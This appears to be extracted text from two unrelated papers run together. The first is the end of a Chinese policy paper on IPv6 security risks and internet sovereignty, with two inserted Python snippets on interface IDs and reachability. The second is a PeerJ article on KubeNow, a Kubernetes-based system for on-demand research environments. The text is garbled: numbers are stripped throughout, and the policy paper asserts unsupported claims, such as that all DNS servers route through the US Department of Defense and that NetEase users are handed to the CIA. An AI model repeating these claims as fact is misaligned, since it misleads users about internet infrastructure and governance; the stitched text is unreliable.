) all participants in the ietf working group discussions must disclose known intellectual property rights, or any intellectual property rights covered or likely to be covered by the matter under discussion, and their recommenders. this requirement applies to all ip claimants, their employers, sponsors, or agents of ip claimants, without the need for patent searches. in this way, the ietf tends to choose technologies with undeclared intellectual property rights, or technologies with free intellectual property rights; the ietf may adopt technologies at its discretion, or not commit to licensing; and ietf specifications do not stipulate mandatory security technologies. therefore, the ietf does not define the internal or external problems of the main patent technologies for ipv6. so what is the practical significance of saying that china holds a large number of ipv6 intellectual property rights? after all, we are still subject to the united states and the ietf!

iii. the problem of ipv6
practice has proved that many ipv6 security traps occur and appear when ipv6 cannot interoperate with ipv4, or when ipv6 is made to run on the network architecture of the ipv4 technical protocol. once they happen, they will not go away, just like opening pandora's box (security traps or temptations) of network security. for example: the design of the interface id in an ipv6 address will lead, in disguise, to a mandatory real-name system for ordinary users. because ipv6 also stipulates that the interface id can be allocated in other ways, even by random numbers or manually, ipv6 experts, like hackers, can easily hide their physical address. this state is no more insecure than ipv4, but it becomes an astonishing security scandal once it is widely known, easily operated and arbitrarily adopted by ordinary users who have no knowledge of ipv6. gateway tunneling may also help hackers or spies of hostile camps hide their whereabouts, making hackers more difficult to find, or causing greater national strategic security problems. the network address and addressing mode of ipv6, data routing and exchange are real end-to-end, and there is no need for network address translation (nat). at the same time, the network identification of user equipment is directly exposed, which can be easily collected and used. through the cross aggregation and correlation analysis of multi-source and multi-element identification data, it is easy for humans and machines to be bound permanently, and thus beyond the current "precise push" (advertising) ability, deriving "precise tracking", "precise positioning", "precise strike", etc., with great potential security risks. ipv6 is applied to smart homes, smart communities, big data, cloud computing, etc. it may be "accurate" to the details of a family, a family member or the staff in the same office, etc., which is extremely dangerous. on the one hand, almost all servers of well-known websites are hosted abroad. for example, the netease e-mail server is hosted on amazon's cloud service platform (aws). at least the ip address belongs to amazon. the risk and consequences of domain names and addresses being controlled are obvious. it simply hands over hundreds of millions of netease users to the u.s. central intelligence agency and its intelligence system (ic) members for all-round, all-view and all-time monitoring and supervision.
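to make the interface id concern discussed earlier in this section more tangible, the sketch below contrasts the two ways an ipv6 interface id can be derived: the (optional) modified eui-64 scheme, which embeds the device's mac address and therefore exposes a stable hardware identity to every peer, and an rfc 4941-style randomised id, which hides it. this is only an illustration using the python standard library; the mac address and prefix are placeholder values.

import random
import ipaddress

def eui64_interface_id(mac: str) -> int:
    """derive the 64-bit interface id from a mac address (modified eui-64):
    flip the universal/local bit of the first octet and insert 0xfffe in the middle."""
    octets = [int(part, 16) for part in mac.split(":")]
    octets[0] ^= 0x02  # flip the u/l bit
    eui = octets[:3] + [0xFF, 0xFE] + octets[3:]
    return int.from_bytes(bytes(eui), "big")

def address(prefix: str, interface_id: int) -> ipaddress.IPv6Address:
    """combine a /64 prefix with a 64-bit interface id."""
    return ipaddress.IPv6Network(prefix)[interface_id]

mac = "52:54:00:12:34:56"                             # placeholder mac address
prefix = "2001:db8:1:2::/64"                          # documentation prefix
stable = address(prefix, eui64_interface_id(mac))     # leaks the mac into the address
temporary = address(prefix, random.getrandbits(64))   # rfc 4941-style randomised id
print(stable)
print(temporary)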
amazon has publicly announced the provision of cloud services to the cia and its members of the intelligence system (ic), which is known as the "amazon cloud service platform secret zone" (aws, amazon web services). amazon called the service "the first and only commercial cloud provider to provide comprehensive data classification services to the government, including non-secret, sensitive, classified and top secret data." on the other hand, bind, the system software of dns server, has become the standard of implicit monopoly. almost all users in the world do not know the truth (the relevant national authorities and scientific research institutions have never issued a warning, nor have guided users taken any preventive and governance measures), that is, the united states has long been on all dns servers (ipv and ipv ) on the internet, solidified the necessary route to the network information center of the united states department of defense first. no matter what users are who, whether like it or not, all data and information exchanges must unconditionally comply with the security principles and measures of "american interests first". the great wall firewall is invalid for ipv . at present, ipv network in colleges and universities can easily log in the "forbidden network" of foreign countries (websites of religion, terror, anti-propaganda, etc.). another reason why ipv is not suitable to replace ipv is the conflict about ipv on the internet backbone network, which leads to the congestion of network flow. at present, there is no reliable technical solution. the overall comparison of ipv and ipv in the case of a single failure shows that in % countries, ipv connection is more reliable. an important discovery in ipv field is that many isps do not have correct network connection under normal operation conditions. for example, in the united states, only about % of autonomous systems (as) support ipv , while in china, china telecom (as ) only gets global connectivity through one service provider, hurricane electric (he), which is in worse condition. technically speaking, china's public network has fallen into the hands of others, the above-mentioned major ipv security risks (pitfalls, temptations and solidified routes, etc.) are not completely solved, and state organs and special departments, as well as important sensitive industries involving the national economy and people's livelihood, dare not use them. if it is used, the consequences will be unpredictable. the principles, systems, and strategies that us internet is dominated and controlled by the us military remain unchanged. the u.s. military has established and improved a network operation system with strict command and coordination from the top down, especially in the field of cyberspace, which is strictly regulated by the u.s. military. however, it is difficult for china to make a firm response to network operations in the first time, and to organize a high-speed, high-efficiency and high- intensity anti reaction capability of the military civilian joint network operation system in the first time. 
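returning to the connectivity comparison mentioned above, a rough way to check whether a given service is actually reachable over both protocol families is to resolve its a and aaaa records and attempt a connection to each. the sketch below uses only the python standard library and a placeholder host name, and is meant as an illustration rather than a rigorous measurement.

import socket

def reachable(host: str, family: int, port: int = 443, timeout: float = 3.0) -> bool:
    """return True if at least one address of the given family (AF_INET or AF_INET6)
    accepts a tcp connection on `port`."""
    try:
        infos = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)
    except socket.gaierror:
        return False  # no a/aaaa record at all
    for _family, _type, _proto, _canon, sockaddr in infos:
        try:
            with socket.create_connection(sockaddr[:2], timeout=timeout):
                return True
        except OSError:
            continue
    return False

host = "www.example.org"  # placeholder dual-stacked host
print("ipv4 reachable:", reachable(host, socket.AF_INET))
print("ipv6 reachable:", reachable(host, socket.AF_INET6))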
the current supervision, command and coordination system and framework of cyberspace in china are neither suitable for the perception situation of the internet in the united states, which has completed and improved the preparations for launching cyber war at any time in terms of technology and law, nor for the needs of accelerating the construction of cyber power and effectively responding to the united states' overall containment of china in cyberspace. international journal of advanced network, monitoring and controls volume , no. , iv. "two china" on the internet icann is suspected of deliberately manufacturing "two chinas" on the internet for a long time, deliberately setting the technical conditions and basis of "two chinas" that can cause network information confusion, and deliberately restraining, containing and interfering with china's autonomous and controllable development of sovereign and secure networks. according to the regulations of internet name and digital address distribution agency in the united states, some ip addresses are assigned to the five regional internet registries (rir) in the world, and then the five regional internet registries are respectively responsible for the registration services in the region. ip address and as number assignment for asia pacific countries are managed by the asia pacific network information center (apnic), which is established in australia. under the five regional internet registries, rir is divided into national registration agency nir and regional registration agency lir. the u.s. internet name and digital address distribution agency divides the asia pacific region into economies (countries and regions). the asia pacific network information center has seven core members (national registration agencies) who can enjoy special preferential conditions, including china, japan, south korea, vietnam, india, indonesia, and even taiwan. according to the official website of taiwan internet information center (twnic), founded in december , its original competent department was the ministry of transport of taiwan authorities. in december , it was changed into the national communication and broadcast commission and became the national network information center. in december , it was at a time when lee teng hui publicly supported chen shui bian's campaign for "president" and taiwan's independence was more active. on may , , a gun shot put chen shui bian on the throne of "president". since then, in the "internet" activities held around the world, taiwan's "national flag of the republic of china" has been put in the venue; taiwan's representatives of twnic, the "national registration agency", enjoy the same treatment as those of cnnic (china internet network information center) of the people’s republic of china. china has clearly declared the principle of "one china" sovereignty in international organizations, but why is the internet an exception? why should we tolerate the emergence of "two chinas" on the internet many years after china's full-featured access to the internet in ? it concerns the geopolitical issues of internet governance, the logical, physical and perceptual boundaries of internet monitoring, and the fact that taiwan can easily control china's data sovereignty and open-source information by using domain name rotation, data "transgenic" technology and other technologies. it concerns the sovereignty principle and security bottom line of china's cyberspace. this is not a simple technical issue, but a general political issue. 
china's “anti-segregation law”, issued in , clearly declared that there is only one china in the world, the mainland and taiwan belong to one china, and china's sovereignty and territorial integrity are inseparable. the state will never allow the "taiwan independence" secessionist forces to separate taiwan from china in any name or in any way. the fact that the "taiwan independence" secessionist forces split china in any name or in any way, the state may take non peaceful means and other necessary measures to safeguard its sovereignty and territorial integrity. any negligence on the sovereignty and security of cyberspace data (no matter professional or amateur) may lead to irreparable loss or disaster of cyberspace sovereignty and security (national sovereignty and security) at any time. how can one tolerate others encroaching on one's preserve? v. suggestion firstly, re-understand the internet and deepen the governance of the interconnected network. based on a wide range of opinions, we should open up and conduct large-scale discussions on the deployment of ipv , practically adjust our strategies and tactics in the field of cyberspace information, correctly guide and promote the construction and development of china’s sovereign network, future network, and the global community of destiny in cyberspace. secondly, re-consider the e-government extranet, comprehensive website and network infrastructure security, design and implement china's autonomous and controllable cyberspace security monitoring system. thirdly, thoroughly eliminate and eradicate the adverse effects, political weaknesses and technological constraints of "two chinas" on the internet. about the authors mou chengjin, the director of the international strategy research center of china mobile communications federation. the paper version was international journal of advanced network, monitoring and controls volume , no. , firstly published in chinese on december , , revised in january . if the chinese version was needed, please contact the author. email: mcjzp @ .com . guo xiaohui, associate professor of henan vocational college of agriculture. email: guoxiaohui@hnca.edu.cn submitted may accepted october published november corresponding author marco capuccini, marco.capuccini@farmbio.uu.se academic editor daniel katz additional information and declarations can be found on page doi . /peerj-cs. copyright capuccini et al. distributed under creative commons cc-by . open access on-demand virtual research environments using microservices marco capuccini , , anders larsson , matteo carone , jon ander novella , noureddin sadawi , jianliang gao , salman toor and ola spjuth department of information technology, uppsala university, uppsala, sweden department of pharmaceutical biosciences, uppsala university, uppsala, sweden national bioinformatics infrastructure sweden, uppsala university, uppsala, sweden department of surgery and cancer, imperial college london, london, united kingdom abstract the computational demands for scientific applications are continuously increasing. the emergence of cloud computing has enabled on-demand resource allocation. however, relying solely on infrastructure as a service does not achieve the degree of flexibility required by the scientific community. here we present a microservice-oriented methodology, where scientific applications run in a distributed orchestration platform as software containers, referred to as on-demand, virtual research environments. 
the methodology is vendor agnostic and we provide an open source implementation that supports the major cloud providers, offering scalable management of scientific pipelines. we demonstrate applicability and scalability of our methodology in life science applications, but the methodology is general and can be applied to other scientific domains. subjects bioinformatics, computational biology, distributed and parallel computing, scientific computing and simulation, software engineering keywords microservices, cloud computing, virtual research environments, application containers, orchestration introduction modern science is increasingly driven by compute and data-intensive processing. datasets are increasing in size and are not seldom in the range of gigabytes, terabytes or even petabytes and at the same time large-scale computations may require thousands of cores (laure & edlund, ). accessing adequate e-infrastructure therefore represents a major challenge in science. further, the need for computing power can vary a lot during the course of a research project and large resources are generally needed only when large-scale computations are being executed (lampa et al., ; dahlö et al., ). to this extent, moving analyses to cloud resources represents an interesting opportunity from an investment perspective. indeed, cloud resources come as a configurable virtual infrastructure that can be allocated and released as needed with a pay-per-use pricing model (armbrust et al., ). however, this way of procuring resources introduces a layer of complexity that researchers may find hard to cope with; configuring virtual resources requires substantial technical skills (weerasiri et al., ) and it is generally a tedious and repetitive task when it is done on demand. therefore, when running scientific applications how to cite this article capuccini m, larsson a, carone m, novella ja, sadawi n, gao j, toor s, spjuth o. . on-demand virtual re- search environments using microservices. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:marco.capuccini@farmbio.uu.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. on cloud, there is a need for a methodology to aid this process. in addition, to promote sustainability, this methodology should be generally applicable over multiple research domains, hence allowing to compose working environments from established scientific software components. the idea of allocating composable, on-demand working environments on a ‘‘global virtual infrastructure’’ was envisioned by candela, castelli & pagano ( ). these working environments, which comprehensively serve the needs of a community of practice, are commonly referred to as virtual research environments (vres). roth et al. ( ) and assante et al. ( ) identify cloud resources as the underlying ‘‘global virtual infrastructure’’ for these systems and provide two similar implementations that offer on-demand allocation of vres. both implementations enable to dynamically compose vres from a collection of scientific applications, which are nevertheless installed directly on virtual machines (vms). following this approach, due to the remarkably heterogeneous landscape of scientific software packages, one will almost inevitably encounter conflicting dependencies (williams et al., ). 
the technology that has been recently introduced under the umbrella of microservice-oriented architecture (see ‘microservice-oriented architecture and technology’) has cleared the way for a remedy to this problem, providing an improved mechanism for isolating scientific software (williams et al., ). the idea consists of introducing an engine that leverages on kernel namespaces to isolate applications at runtime. the resulting software environments are lightweight, easy and fast to instantiate, and they are commonly referred to as containers. noticeable efforts in leveraging this technology to deliver improved vres were made by the phenomenal project (in medical metabolomics) (peters et al., ), by the extras project (in astrophysics) (d’agostino et al., ) and by the square kilometer array (ska) project (in radio astronomy) (wu et al., ). however, despite of microservice-oriented applications being consider the gold standard of cloud-native systems, extras and ska run their vres on dedicated servers. here we introduce a general methodology to allocate vres on demand using cloud resources—which we have also implemented in phenomenal. the methodology that we introduce in this paper addresses a number of research questions that arise when designing on-demand vres using microservices. firstly, allocating virtual infrastructure and setting up the required middleware is hard for non-it experts. thus, we face the question of how to provide a seamless allocation procedure for scientists while still enabling a good level of configurability for a specific set up. secondly, scientists should be able to run vres on multiple clouds while operating with the same immutable infrastructure and tooling ecosystem. when using public cloud resources, this is challenging due to the heterogeneity of vendor-specific features and tools. further, it is common in academic settings to leverage commodity clouds that run on premises. while it is important to support these systems as regulations may forbid certain datasets to be handled in public settings, commodity clouds offer a reduced set of features; we face the question of how to enable immutable vres in commercial and commodity settings. lastly, we face the question of how to provide vres that scale reasonably well. to this extent, there are two main aspects that we cover in this paper: ( ) scaling of scientific analyses and ( ) scaling of vre instantiation. in connection to this second point, it is important to consider capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. that our methodology is designed around the idea of on-demand, short-lived deployments; high availability is not crucial while instantiation speed is of great importance. based on our methodology, we implemented kubenow: a comprehensive open-source platform for the instantiation of on-demand vres. please notice that we use the term platform as opposed to platform as a service (paas), because kubenow comes with a command-line interface (cli) that operates from the user’s workstation—rather than providing a publicly available application programming interface (api). the platform is currently in production as part of the phenomenal project and we employ such use case to demonstrate the applicability of the proposed methodology. in summary, our key contributions are as follows. • we introduce a general methodology for on-demand vres with microservices (‘on- demand vres with microservices’). 
the methodology enables: ( ) simplicity in vre instantiation, ( ) vre allocation over commercial and commodity clouds and ( ) scalable execution of scientific pipelines on cloud resources. • we provide an open source implementation, named kubenow, that enables instantiating on-demand vres on the major cloud providers (‘implementation’). • we demonstrate the applicability and the scalability of our methodology by showing use cases and performance metrics from the phenomenal project (‘evaluation’). in connection to our first research question, concerning simplicity, this also contributes in showing how researchers with little it expertise were able to autonomously allocate multi-node vres using kubenow. • we evaluate the scalability of kubenow in terms of deployment speed and compare it with a broadly adopted microservice architecture installer (‘deployment automation scalability’). microservice-oriented architecture and technology the microservice architecture is a design pattern where complex service-oriented applications are composed of a set of smaller, minimal and complete services (referred to as microservices) (thönes, ). microservices are independently deployable and compatible with one another through language-agnostic apis, like building blocks. hence, these blocks can be used in different combinations, according to the use case at hand. this software design promotes interoperability, isolation and separation of concerns, enabling an improved agile process where developers can autonomously develop, test and deliver services. software container engines and container orchestration platforms constitute the cutting- edge enabling technology for microservices. this technology enables the encapsulation of software components such that any compliant runtime can execute them with no additional dependencies on any underlying infrastructure (open container initiative, ). such software components are referred to as software containers, application containers, or simply containers. among the open source projects, docker emerged as the de-facto standard software container engine (shimel, ). along with docker, singularity capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. has also seen considerable adoption by the scientific community as it improves security on high-performance computing systems (kurtzer, sochat & bauer, ). even though container engines like docker and singularity serve similar purposes as hypervisors, they are substantially different in the way they function. when running a vm, an hypervisor holds both a full copy of an operating system (os) and a virtual copy of the required hardware, taking up a considerable amount of system resources (vaughan-nichols, ). in contrast, software container engines leverage on kernel namespaces to provide isolation, thus running containers directly on the host system. this makes containers considerably lighter and faster to instantiate, when compared to vms. nevertheless, containers have a stronger coupling with the os, thus if they get compromised an attacker could get complete access to the host system (manu et al., ). hence, in real-world scenarios a combination of both vms and containers is probably what most organizations should strive towards. in current best practices, application containers are used to package and deliver microservices. 
these containers are then deployed on cloud-based clusters in a highly- available, resilient and possibly geographically disperse manner (khan, ). this is where container orchestration frameworks are important as they provide cluster-wide scheduling, continuous deployment, high availability, fault tolerance, overlay networking, service discovery, monitoring and security assurance. being based on over a decade of google’s experience on container workloads, kubernetes is the orchestration platform that has collected the largest open source community (asay, ). other notable open source orchestration platforms include marathon ( ), which is built on top of the mesos resource manager (hindman et al., ), and swarm which was introduced by docker (naik, ). on-demand vres with microservices in this section we introduce the methodology that enables on-demand vres. the methodology is built around the microservice-oriented architecture, and its companion technology. here we explain our solution on a high level, thus not in connection to any specific software product or vendor. later in this paper (‘implementation’) we also show an implementation of this methodology that builds on top of widely adopted open source tools and cloud providers. architecture figure shows a general architecture for on-demand vres. the architecture is organized in three layers: cloud provider, orchestrator and microservices. in describing each layer we follow a bottom-up approach. cloud provider at the lowest level, the cloud provider layer manages virtual resources at infrastructure level. in our methodology this layer enables to dynamically procure infrastructure when a vre is instantiated. physical resources can be outsourced (public cloud), in house (private cloud) or anywhere in between (hybrid cloud). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure microservice-oriented architecture for on-demand vres. the architecture is organized in three layers: cloud provider, orchestrator and microservices. the two lowest layers offer necessary services to the above layer. in particular the cloud provider manages virtual resources at infrastructure level, and the orchestrator manages microservices that run as application containers. the uppermost layer run a set of container-based microsrvices for a certain community of practice. the vre is instantiated through a deployment automation, which may also configure a content delivery network (cdn) and a dynamic domain name system (dyndns) to serve the user interfaces. full-size doi: . /peerjcs. /fig- there are a few necessary services that a cloud system should offer to serve the purpose of a vre. first, a compute service should enable for booting and managing the vms that will provide computing power. second, a network service should provide management for vms interconnection, routing, security rules and other networking-related concerns. third, a block storage service should provide volumes management for vms. finally, an api should provide programmatic access to the all of the other services (to enable automation). apart from these basic requirements, vres need a few other services that may not be offered by commodity providers (such as moderately sized university installations). luckily, their implementation as microservices is relatively easy as we describe in ‘microservices’— and it is crucial in commodity settings. 
first, it is important to point out that the main purpose of vres is to run computations through scientific tools. these tools can be run dispersively in the virtual cluster, thus needing a shared file space for synchronization and concurrent dataset handling. this cannot be provided via block storage, as usually it does not allow for concurrent access. concurrent access may be achieved via object storage, a well-established storage service that is capable of providing shared file spaces (karakoyunlu et al., ). as the name suggests the service manages files as objects, thus being substantially different from posix storage systems. this may represent a challenge in the context of vres, as scientific tools can usually only operate on a locally-mounted posix space. however, this challenge can be tackled by third party products (such as capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. cloudfuse ( ), that can abstract and mount the object storage as a posix file system. as an alternative to object storage, some cloud providers recently started to offer shared posix storage, which enables concurrent access on posix file spaces. some examples include amazon elastic file system ( ), google cloud filestore, ( ), azure netapp files ( ) and openstack manila ( ). nevertheless, in contrast to object storage, this solution did not yet reach a consensus in terms of implementation and functionalities across different providers. finally, a cloud provider may offer a load balance service. as the name suggests, this service can be used to load balance incoming traffic from a certain public ip to a configurable set of vms or microservices. in the context of vres, this can be useful to expose many services under a single public ip (as related quotas may be limited). orchestrator as we mentioned in the introduction, our methodology makes use of application containers to improve the isolation of scientific software environments. a few cloud providers offer native management for container instances (amazon elastic container service, ; google cloud run, ; azure container instances, ; openstack zun, ), nevertheless these solution are strongly coupled with vendor-specific tooling and they are seldom supported by commodity cloud systems. hence, to promote portability of vres, it is preferable to not rely on container-native cloud environments. however, when leveraging solely on vms there is no straightforward way to manage disperse containers. this is where the orchestrator is important, as it abstracts vm-based clusters so that containers can be seamlessly scheduled on the underlying resources. there are a few orchestration platforms available in the open source ecosystem (as we discussed in ‘microservice-oriented architecture and technology’), and our methodology is not tied to any of these in particular. however, there are a few services that an orchestrator should offer to support on-demand vres. first, a scheduling service should support cluster-wide resource management and scheduling for application containers. this service should also manage container replication across the cluster, and reschedule failed container (possibly to different nodes in case of vm failure). since containers can be scheduled across many vms, an overlay network should provide interconnection among them. in addition, a service discovery mechanism should provide the means to retrieve container addresses in the overlay network. 
this usually comes as a dns service that should only be available inside the cluster. in order to provide data persistency and synchronization between replicas, a volume management service should offer container volumes operations across the cluster. this means that containers should be able to access a shared volume, possibly concurrently, from any host. since this represents a major challenge, on this layer volume management should only represent an abstraction of an underlying storage system, such as a block storage or a shared posix storage. apart from file spaces, the orchestrator should be able to manage and mount secrets, such as encryption keys and passwords, in the containers through a secret management service. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cloud integrations may be optionally offered by the orchestrator, and be beneficial in the context of vres. this service enables to dynamically provision resources on the underlying layer. for instance, on-demand vres with cloud integrations may dynamically procure load balancers and cloud volumes for the managed containers. finally, the orchestrator should provide an api to allow programmatic access to its services (enabling automation). microservices the set of services for a certain community of practice run as container-based microservices, on top of the orchestration platform. while we envision the previous layers to be exchangeable between communities of practice, this layer may offer substantially different functionalities, according to the application domain. luckily, microservices-oriented systems for different scientific domains (e.g., phenomenal, extras and ska) are very similar in their design, allowing us to give a general overview of this layer. first, we make a distinction between jobs and deployments. jobs are mainly application containers that run scientific tools, to perform some analyses. the idea consists of instantiating each processing tool, execute a part of the analysis, and allowing it to exit as soon as the computation is done. in this way the analysis can be divided into smaller blocks and distributed over the cluster. deployments should include a workflow system, a monitoring platform and user interfaces. workflow systems (or similar analytics services) enable to define and orchestrate distributed pipelines of containerized tools. for the containerized tools scheduling to work, it is crucial that the selected workflow system is compatible with the underlying orchestrator. monitoring systems collect cluster-wide performance metrics, logs and audit trails, possibly aggregating them in visual dashboards. user interfaces provide graphical access to the workflow and monitoring systems, and possibly enable interactive analysis through the execution of live code. an important remark is that as interfaces are typically stateless, their implementation as functions (baldini et al., ) should also be considered when the integration with the workflow systems and the monitoring platform is feasible. finally, on this layer shared posix storage, object storage and load balance may be implemented as container-based microservices, if not provided by the underlying commodity cloud service. many available open source projects provide these services and support the major orchestration platforms, thus making the implementation relatively simple (see ‘implementation’). 
content delivery network and dynamic domain name system content delivery networks (cdns) are geographically disperse networks of proxy servers (pathan & buyya, ). the main goal of a cdn is to improve the quality of web services by caching contents close to the end user. even though this is not particularly beneficial for short-lived systems, modern cdns offer additional benefits that are relevant for on-demand vres. in fact, when proxying web traffic, cdns can provide seamless https encryption, along with some protection against common attacks (e.g., distributed denial of service). since modern cdns can be configured programmatically via apis, this provides an easy way to setup encryption on-demand. when comparing with let’s encrypt (manousis et al., ), this system has the advantage of seamlessly issuing and storing a single certificate. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this is relevant for on-demand systems, as they may need to be instantiated multiple times in a relatively short period of time, thus making important to reuse existing certificates. in contrast, let’s encrypt only enables to issue new certificates leaving their management up to the users. dynamic domain name system (dyndns) is a method that enables automatic dns records update (vixie et al., ). since on-demand vres are instantiated dynamically, each instance can potentially expose endpoints on different ip addresses. dyndns enables to automatically configure dns servers, so that endpoints will always be served on a configurable domain name. even though we recommend adoption for user friendliness, cdns and dyndns are optional components. secure shell (ssh) tunnelling and virtual private network gateways are valid alternatives to securely access the endpoints. in addition, it is relatively simple to discover dynamically allocated ip addresses by using the cloud api. deployment automation setting up the presented architecture requires substantial knowledge of the technology, and it may represent a challenge even for a skilled user. furthermore, for on-demand vres this time-consuming task needs to be performed for each instantiation. therefore, on-demand vres should include a deployment automation. the automation should operate over multiple layers in the architecture, by setting up the infrastructure through the cloud api and by setting up the microservices through the orchestrator api. in addition, the automation should also configure the cdn and dyndns when required. the deployment automation should be based on broadly adopted contextualization tools. these can be cloud-agnostic, thus supporting many cloud providers, or cloud specific. cloud-agnostic tools are usually open source, while cloud-specific tools may be licensed. the former has the advantage of generalizing operations over many providers, while the latter might offer commercial support. no matter which set of contextualization tools is chosen, the deployment automation should offer a common toolbox that operates across all of the supported cloud providers. to this extent, contextualizing the system automatically across multiple commercial and commodity clouds is going to be challenging. for the orchestrator layer one could in principle rely on managed setup automations. however, this approach has the disadvantage of tailoring the orchestration layer to vendor-specific tooling. the same stands when relying on managed storage and load balance. 
moreover, such managed services are seldom provided by commodity clouds. therefore, our recommendation is to automate the setup of the orchestration layer without relying on managed services, which also has the advantage of making this layer immutable across providers. along the same lines, we recommend automating the setup of storage and load balancing as microservices. this not only gives the user the possibility of deploying these services when they are not offered by the commodity cloud of choice, but also avoids tailoring the analyses to any vendor-specific storage system.

implementation
we provide an open source implementation of our methodology, named kubenow (kubenow github organization, ). kubenow is generally applicable by design, as it does not explicitly define the uppermost layer in fig. . instead, kubenow provides a general mechanism to define the microservices layer, so that communities of practice can build on-demand vres according to their use cases. kubenow is cloud-agnostic: it supports amazon web services (aws), google cloud platform (gcp) and microsoft azure, which are the biggest public cloud providers in the market (bayramusta & nasir, ), as well as openstack (the dominating in-house solution (elia et al., )). this is of great importance in science, as it allows researchers to take advantage of pricing options and research grants from different providers while operating with the same immutable infrastructure. furthermore, supporting in-house providers makes it possible to process sensitive data that may not be allowed to leave research centers.

kubenow implements object storage, shared posix storage and load balancing in the microservices layer. this is a straightforward solution to maximize the portability of on-demand vres. in fact, these services may not be available in certain private cloud installations, and their apis tend to differ substantially across providers (requiring orchestrators and microservices to be aware of the current host cloud). on the other hand, leveraging cloud-native services may be beneficial in some cases. as an example, using cloud-native storage makes it possible to persist the data on the cloud even when the on-demand vre is not running. thus, kubenow gives the possibility to skip the provisioning of object storage, shared posix storage and load balancing, leaving their handling to the communities of practice in such cases. finally, kubenow is built as a thin layer on top of broadly adopted software products, summarized in the following list.

• docker (shimel, ): the open source de facto standard container engine.
• kubernetes (asay, ): the orchestration platform that has collected the largest open source community.
• glusterfs (glusterfs, ): an open-source distributed file system that provides both shared posix file spaces and object storage.
• traefik (traefik, ): an open-source http reverse proxy and load balancer.
• cloudflare (cloudflare, ): a service that provides cdn and dyndns.
• terraform (terraform, ): an open-source infrastructure-as-code tool that enables provisioning at the infrastructure level.
• ansible (ansible, ): an open-source automation tool that enables provisioning of vms and kubernetes.
• packer (packer, ): an open-source packaging tool that enables packaging of immutable vm images.
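once such a stack is running, the different layers can be checked with the standard tooling; a quick sanity check could look like the following (a sketch only—the namespaces and release names depend on the actual deployment):

$ kubectl get nodes                     # orchestration layer: have all nodes joined?
$ kubectl get pods --all-namespaces     # glusterfs, traefik and user services running?
$ helm list --all-namespaces            # application packages installed on top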
configurability
figure shows a sample kubenow configuration. in a kubenow cluster there are four main node entities that can be configured: master, service, storage and edge.

figure : kubenow sample configuration. there are four main node entities in a kubenow cluster, managed via kubernetes. apart from the master node, which runs the kubernetes api, the user can choose how many instances of each node entity to deploy. service nodes run the user application containers. storage nodes run glusterfs and attach a block storage volume to provide more capacity. edge nodes run traefik to load-balance internet traffic to the application containers, and each of them is associated with a public ip. further, cloudflare manages dns records for the edge nodes' ips, and optionally proxies internet traffic to provide encryption.

apart from the master node, the user can choose how many instances of each node entity to deploy. by default, each node shares the same private network, which allows incoming traffic only on ssh, http and https ports. the master node manages various aspects of the other nodes, retaining the cluster status and running the kubernetes api. the current implementation of kubenow does not support multiple master nodes. this is because the purpose of kubenow is to enable on-demand processing on cloud resources; under this assumption, deployments are supposed to be short-lived, hence high availability is not crucial. service nodes are general-purpose servers that typically run user containers. storage nodes run glusterfs, and they are attached to a block storage volume to provide additional capacity. finally, edge nodes are service nodes with an associated public ip address, and they act as reverse proxies and load balancers for the services that are exposed to the internet. in order to resolve domain names for the exposed services, a wildcard record is configured in the cloudflare dynamic dns service (cloudflare, ), such that a configurable base domain name will resolve to the edge nodes. in addition, the traffic can be proxied through the cloudflare servers, using a fully encrypted connection. when operating in this mode cloudflare provides https connections to the end user, and it protects against distributed denial of service, customer data breaches and malicious bot abuse.

apart from the typical setting that we show in fig. , some other configurations can be used. excluding the master node, each node entity is optional and it can be set to any replication factor. for instance, when ip addresses are particularly scarce, it is possible to deploy no edge node and to use the master node as reverse proxy instead (this may often be the case in commodity cloud settings). the same stands for the storage nodes, which can be removed when an external filesystem is available. in addition, for single-server setups, it is possible to deploy the master node only, and to enable it for service scheduling. finally, since entry-level users may find it difficult to reserve a domain name and set it up with cloudflare, it is possible to use nip.io (nip.io, ) instead. nip.io provides an easy mechanism to resolve domain names without needing any configuration (e.g., a name of the form foo.<ip>.nip.io resolves to <ip>).

command-line interface
the kubenow deployment automation is available as a cli, namely kn, that has the goal of making cloud operations transparent. indeed, we envision researchers autonomously setting up cloud resources, without performing complex tasks outside their area of expertise. the kn cli wraps around a docker image that encapsulates terraform, ansible and a few other dependencies, hence docker is the only client-side requirement. listing a shows a typical user interaction.

$ kn init <provider> <dir>
$ cd <dir>
$ kn apply
$ kn helm install <package>
(a) manual configuration

$ kn init --preset <preset> <provider> <dir>
$ cd <dir>
$ kn apply
(b) preset system

listing : kubenow cli user interaction. the init subcommand sets up a deployment directory for a certain cloud provider. when configuring kubenow manually, the user does not specify any preset and moves to the deployment directory, where some configuration files need to be edited. alternatively, one can choose to initialize the deployment with a preset made available by the community of practice (listing b). the apply subcommand then deploys kubenow as specified in the configuration files. lastly, the helm subcommand is used to install the application-specific research environment; when using the preset system this last step is not necessary, as the helm packages that compose the vre are installed automatically as specified in the preset.

the user starts by initializing a deployment directory for a certain cloud provider with the kn init command. the deployment directory contains some template files that need to be filled in. these files can be used to configure how many of each of the available node entities to deploy (see 'configurability'), as well as low-level parameters such as node flavors, networking and credentials. this way of configuring the deployment hides complex kubernetes operations that would otherwise be needed to specialize the nodes. once the user is done with the configuration, the deployment is started by moving into the deployment directory and by running the kn apply command. this command sets up kubernetes as well as the kubenow infrastructure (fig. ). finally, the application-specific research environment is installed on top of kubenow by running helm ( ) (the kubernetes package manager). even if preparing kubernetes packages requires substantial expertise, ready-to-use applications can be made available through helm repositories.

